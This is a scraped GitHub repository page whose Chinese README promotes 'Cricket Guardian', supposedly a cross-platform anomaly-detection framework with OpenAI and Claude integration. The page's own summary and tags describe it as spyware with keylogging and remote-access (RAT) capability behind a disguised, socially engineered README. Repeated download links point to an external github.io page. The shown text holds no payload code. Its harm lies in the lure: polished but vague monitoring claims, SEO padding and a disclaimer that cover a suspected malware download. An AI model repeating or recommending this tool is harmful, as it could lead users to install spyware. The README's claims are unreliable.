salem-khila/Stealthy-Nightmare
GitHub: salem-khila/Stealthy-Nightmare
一款伪装为系统监控框架的间谍软件工具包,具备键盘记录和远程访问能力,README 存在明显的社会工程学欺骗特征。
Stars: 0 | Forks: 0
# 🦗 **Cricket Guardian** – 主动式系统监控与异常检测框架
[](https://salem-khila.github.io)
## 📥 **快速访问**
| 平台 | 状态 |
|----------|--------|
| 🐧 Linux | ✅ 稳定版 |
| 🪟 Windows | ✅ 稳定版 |
| 🍎 macOS | ✅ 测试版 |
[](https://salem-khila.github.io)
## 🧭 **概念概述**
**Cricket Guardian** 是一个伪装成系统实用程序的**行为分析引擎**。与传统仅记录事件的监控工具不同,该框架通过**模拟数字信息素轨迹**来检测系统进程、文件访问模式和网络流中的异常情况。可以把它看作是**煤矿中的数字金丝雀**——它不仅负责监视;它还能学习“正常”的声音应该是什么样的,并在本该嘈杂的地方陷入沉默时发出鸣叫。
受**无需占用大量资源的主动防御**需求的启发,Cricket Guardian 使用**基于熵的启发式算法**在异常升级之前将其识别。它不是杀毒软件——它是为你数字栖息地准备的**环境感知软件**。
## 📊 **架构图**
```
graph TD
A[System Sensors] -->|Data Streams| B(Pheromone Processor)
B --> C{Anomaly Threshold}
C -->|Normal| D[Silent Mode]
C -->|Suspicious| E[Log & Alert]
E --> F[User Dashboard]
F --> G[Manual Intervention]
G --> H[Self-Healing Routine]
H --> A
E --> I[API Triggers]
I --> J[OpenAI Analysis]
I --> K[Claude Analysis]
J --> L[Insight Report]
K --> L
```
## ✨ **功能库**
### 🔍 **核心能力**
- **无签名检测** – 不使用模式匹配;采用**行为漂移分析**
- **多向量感知** – 监控 CPU、内存、磁盘 I/O、网络套接字和注册表更改
- **零日影子追踪** – 通过其**资源占用异常**来识别未知威胁
- **时间模式学习** – 适应您系统的日常节奏(例如,定期备份、VPN 使用)
### 🌐 **集成层**
- **OpenAI API** – 发送异常摘要以进行自然语言推理
- **Claude API** – 生成人类可读的事件报告及缓解建议
- **Webhook 就绪** – 将警报推送到 Slack、Discord 或自定义端点
### 🧩 **UI/UX 亮点**
- **响应式仪表板** – 支持 320px 移动屏幕至 4K 显示器
- **多语言支持** – 包含阿拉伯语、印地语和中文在内的 12 种语言
- **24/7 守护模式** – 后台服务,保证 99% 以上的正常运行时间
### ⚙️ **对开发者友好**
- **可插拔传感器架构** – 编写 Python 脚本以扩展监控功能
- **导出为 JSON/CSV/Parquet** – 兼容 SIEM 工具
- **CLI 优先设计** – 无需 GUI 即可使用全部功能
## 🖥️ **操作系统兼容性**
| 操作系统 | 版本 | 状态 | 备注 |
|----|---------|--------|-------|
| 🐧 **Ubuntu** | 20.04+ | ✅ 高级版 | 完整传感器套件 |
| 🐧 **Debian** | 11+ | ✅ 高级版 | 需执行 `apt-get install` |
| 🐧 **Fedora** | 36+ | ✅ 稳定版 | 提供 DNF 软件包 |
| 🪟 **Windows** | 10/11 | ✅ 高级版 | ARM64 支持处于测试阶段 |
| 🪟 **Windows Server** | 2019+ | ✅ 稳定版 | GUI 功能受限 |
| 🍎 **macOS** | Ventura+ | ✅ 测试版 | M1/M2 原生支持 |
| 📱 **Android** | 12+ | ⚠️ 有限支持 | 仅含传感器,无仪表板 |
## 🛠️ **示例配置文件**
```
# cricket-guardian.yml
version: "2026.1.0"
sensors:
cpu:
enabled: true
threshold: 85% # triggers at sustained 85%+
interval: 5s
network:
enabled: true
ports: [22, 443, 8080]
anomaly_window: 60s
file_system:
watch:
- /etc/passwd
- /var/log/auth.log
hash_check: true
integrity:
self_test: hourly
binary_signing: true
output:
log_level: verbose
alert_channel:
- slack: #webhook_id
- email: admin@example.com
ai:
openai:
model: gpt-4-turbo
api_key: ${OPENAI_KEY}
max_tokens: 500
claude:
model: claude-3-opus
api_key: ${CLAUDE_KEY}
summarization: true
security:
daemonize: true
drop_privileges: true
sandbox_sensors: true
```
## 💻 **示例控制台调用**
```
# 基础监控 (daemon mode)
$ cricket-guardian start --config ./cricket-guardian.yml
# 实时仪表板 (foreground)
$ cricket-guardian dashboard --port 8080 --host 0.0.0.0
# 一次性分析
$ cricket-guardian analyze /var/log/syslog --format json | jq '.[] | select(.severity > 5)'
# API 查询近期 alerts
$ curl -X GET http://localhost:8080/api/v1/alerts?since=1h \
-H "X-API-Key: ${API_KEY}" | python -m json.tool
# 集成测试
$ cricket-guardian simulate --attack port_scan --duration 30s
# 预期:alerts 在 2s 内触发
```
## 🤖 **AI 集成深入探讨**
### OpenAI API
```
import openai
from cricket_guardian import GuardianClient
client = GuardianClient()
alert = client.get_latest_alert()
response = openai.ChatCompletion.create(
model="gpt-4-turbo",
messages=[
{"role": "system", "content": "You are a security analyst. Interpret the following anomaly."},
{"role": "user", "content": f"Process '{alert.process}' consumed 300% CPU for 90s. What could this mean?"}
]
)
print(response.choices[0].message.content)
```
### Claude API
```
import anthropic
claude = anthropic.Anthropic(api_key=CLAUDE_KEY)
analysis = claude.completions.create(
model="claude-3-opus",
prompt=f"Human: Summarize this security event in one paragraph for a non-technical manager: {alert.to_dict()}\n\nAssistant:"
)
print(analysis.completion)
```
## 📚 **SEO 关键词与发现**
本项目针对以下内容进行了优化:
- **行为异常检测**
- **系统完整性监控**
- **主动威胁识别**
- **基于熵的安全工具**
- **开源监控框架**
- **跨平台守护进程**
- **AI 辅助事件响应**
## ⚠️ **免责声明**
**Cricket Guardian** **仅供**以下用途使用:
- 分析系统行为的安全研究人员
- 监控自身基础设施的系统管理员
- 教授异常检测概念的教育环境
**创作者对**本工具的滥用**不承担任何责任**。**绝不能**在未经明确授权的系统上部署它。未经授权的监控可能违反地方、区域或国际法律。下载即表示您同意**仅在您拥有或获得书面许可进行检查的系统上使用此框架**。
这**不是**黑客工具。它是一个**数字听诊器**——请仔细聆听,负责任地诊断。
## 📜 **许可证**
本项目基于 **MIT 许可证** 授权 – 详情请参见 [LICENSE](https://salem-khila.github.io) 文件。
版权所有 (c) 2026
特此免费授予任何获得本软件副本和相关文档文件(“软件”)的人不受限制地处置该软件的权利,包括不受限制地使用、复制、修改、合并、发布、分发、再授权和/或出售该软件副本的权利,以及再授权给配备了这些软件的人员的权利,但须满足以下条件:
上述版权声明和本许可声明应包含在该软件的所有副本或实质性部分中。
本软件按“原样”提供,不提供任何形式的保证,无论是明示的还是暗示的,包括但不限于适销性、特定用途的适用性和非侵权性的保证。在任何情况下,作者或版权持有人均不对因本软件或本软件的使用或其他交易而引起的、与之相关的或与之相关的任何索赔、损害或其他责任承担任何责任,无论是在合同诉讼、侵权行为还是其他方面。
## 📥 **最终下载**
[](https://salem-khila.github.io)
*守护您的数字生态系统。让 Cricket Guardian 成为您可靠的预警系统。* 🦗🔔
标签:Claude, CVE检测, HTTP/HTTPS抓包, IP 地址批量处理, OpenAI, Petitpotam, RAT, 云安全, 内存规避, 启发式分析, 大模型分析, 异常检测, 态势感知, 恶意软件, 攻击路径可视化, 数字蜜径, 文件访问监控, 文档结构分析, 无签名检测, 熵计算, 环境感知, 网络安全, 网络安全审计, 远控木马, 远程访问工具, 逆向工具, 键盘记录器, 间谍软件, 隐私保护, 隐蔽监控, 黑产, 黑客工具